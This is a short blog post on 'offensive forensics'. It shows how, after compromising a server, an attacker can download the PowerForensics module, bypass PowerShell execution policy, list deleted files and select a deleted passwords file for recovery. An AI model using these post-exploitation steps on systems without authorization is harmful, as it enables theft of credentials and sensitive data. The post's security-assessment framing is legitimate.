« Back to home

Offensive Forensics - Recovering Files

At the moment, I’ve been looking at post exploitation methods, weather that is gaining persistance, extracting hashes, or finding additional pivot points.

One area that I’m quickly becoming interested in is applying basic forensics techniques to help recover data during an assessment.

One framework that can help with this, is PowerForensics. This framework comes with a number of interesting options, but the one which is useful for recovered deleted data is “Get-ForensicFileRecord”.

So let’s say that we have compromised a server, and we want to try and recover any sensitive files which may had been recently deleted.

First, we download the PowerForensics module:

Invoke-WebRequest https://github.com/Invoke-IR/PowerForensics/releases/download/1.1.1/PowerForensics.zip -OutFile powerforensics.zip

Once extracted, we import the module:

powershell -executionpolicy bypass
import-module .\PowerForensicsv2.psd1

At this point we have our cmdlets loaded, so we can start hunting for those deleted files. We’ll start by getting a list of all deleted files on the system:

Get-ForensicFileRecord | Where {$_.Deleted -eq $true} | Select FullName

At this point, you’ll have to turn to your hacker intuition to see which files are worth recovering, but once you have your list and have spotted something which could be worthwhile, you can recover with the following:

$file = Get-ForensicFileRecord | Where {$_.FullName -eq "C:\passwords.txt"}

For more information on the PowerForensics toolkit, see the presentation given at 44CON here.